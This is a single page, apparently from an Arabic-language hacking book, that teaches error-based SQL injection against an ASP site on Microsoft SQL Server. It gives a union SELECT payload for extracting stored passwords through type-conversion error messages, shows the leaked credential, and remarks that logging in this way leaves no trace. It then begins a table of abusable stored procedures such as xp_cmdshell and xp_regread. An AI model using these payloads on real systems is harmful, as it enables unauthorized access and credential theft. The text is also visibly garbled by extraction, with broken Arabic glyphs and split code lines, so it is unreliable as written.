Page 238 - بسم الله الرحمن الرحيم

P. 238

‫‪ (:‬حصلنا على أول أسم مستخد‪.‬م وهو عاد ًة ما يكون للدمن‬
‫وسبب ظهور هذا الخطأ هو لننا نطلب من محرك ‪ SQL‬أن يقو‪.‬م بتحويل قيمة نصيه )وهي‬

‫‪ (Lame_Admin‬إلى قيمة عدديه صحيحه) ‪(int‬‬
‫وهو الشيء الغير مسمو ح ‪ ,‬لذلك يقو‪.‬م بأختبارك أنه ل يستطيع تصحويل ‪ Lame_Admin‬إلى قيمة عدديه‬

‫صحيحه ‪ (:‬هذا أذكى شي قامت ‪ microsoft‬بعمله ‪(:‬‬
‫الن حصلنا على أسم المستخد‪.‬م وسنحاول الحصول على كلمة المرور‬
‫ندختل أسم المستخد‪.‬م التالي ‪blah' union SELECT passwd,passwd,passwd,pass:‬‬

‫‪wd,passwd FROM user‬‬
‫بنفس العدد السابق عند حصولنا على أسم المستخد‪.‬م‬

‫سنحصل على هذا الخطأ‬

‫اقتباس‪:‬‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
‫‪''80040e07‬‬

‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Syntax‬‬
‫‪error converting the‬‬

‫‪.varchar value 'stupid' to a column of data type int‬‬
‫‪admin/admin.asp, line 13/‬‬

‫حصلنا على أسم المستخد‪.‬م وكلمة المرور ويمكننا تصسجيل الدختول للصفحة المحميه بدون وجهود أي أثر لنا‬
‫إل إذا كانت الصفحه المحميه عند الدختول لها تصقو‪.‬م بطباعة بعض المعلومات مثل رقم اليبي لختر شخض قا‪.‬م‬

‫بالدختول بإسم المستخد‪.‬م هذا‬
‫عندها فكر بما ستقو‪.‬م به بنفسك‬

‫بقي أتصكلم عن الـ ‪Stored Procedure‬‬
‫وهي كتشبيه أقرب إلى أدوات موجهوده مسبقا ‪ Built-in‬تصقو‪.‬م بعمل محدد عند طلبها‬

‫ستستطيع الستفاده من الـ ‪ Stored Procedure‬إذا كان الـ ‪ SQL Server‬يعمل على المستخد‪.‬م ‪sa‬‬
‫أو إذا كان المستخد‪.‬م الذي يعمل عليه الـ ‪ SQL Server‬تصم السما ح له بساٍستخدامها‬

‫لذلك فأنت محظوظ عند حصولك على ‪ SQL Server‬بهذه المكانيات‬

‫يوجهد أكثر من ‪Stored Procedure 100‬‬
‫في الجدول التالي أهمها‬

‫‪---------------------------+‬‬
‫‪+------------------------------------------------------------------------------+‬‬
‫| ‪ |----------xp_cmdshell‬تصمرير أمر لنظا‪.‬م التشغيل ) يتم تصنفيذه على حسب صلحيات‬

‫المستخد‪.‬م(‪|-------‬‬
‫| ‪ |-----------xp_regread‬قراءة قيمة مفتا ح في‬
‫الريجستري‪|--------------------------------------------‬‬

‫‪238‬‬

233 234 235 236 237 238 239 240 241 242 243